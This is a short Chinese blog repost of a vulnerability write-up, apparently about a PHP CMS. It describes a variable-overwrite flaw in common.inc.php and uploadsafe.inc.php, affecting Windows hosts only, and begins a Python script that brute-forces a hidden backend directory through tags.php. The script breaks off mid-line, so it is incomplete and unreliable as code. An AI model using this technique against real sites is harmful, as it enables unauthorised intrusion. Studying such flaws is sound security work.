本文最后更新于 2018年02月26日 21:15 可能会因为没有更新而失效。如已失效或需要修正,请留言!

原文 https://xianzhi.aliyun.com/forum/topic/2064

利用限制

仅针对windows系统

进入正题

首先看核心文件common.inc.php 大概148行左右

uploadsafe.inc.php

注意$$_key这一句,变量$key取自于$_FILE,由于$_FILE可控自然$key也可控,此处理论上是可以覆盖任意变量,但是前面有个正则判断不能出现cfg_|GLOBALS。(但是应该还可以覆盖其他变量此处感觉还可以深挖)

本人出发点是找个可以利用

!/usr/bin/env python3

fixed bug by ChaBug

author = Mochazz

import requests
import itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!~@$-+=()" #加上了乱七八糟的符号
back_dir = ""
flag = 0
url = "http://192.168.1.9/tags.php"
data = {

喜欢这篇文章的话就点一点喜欢吧!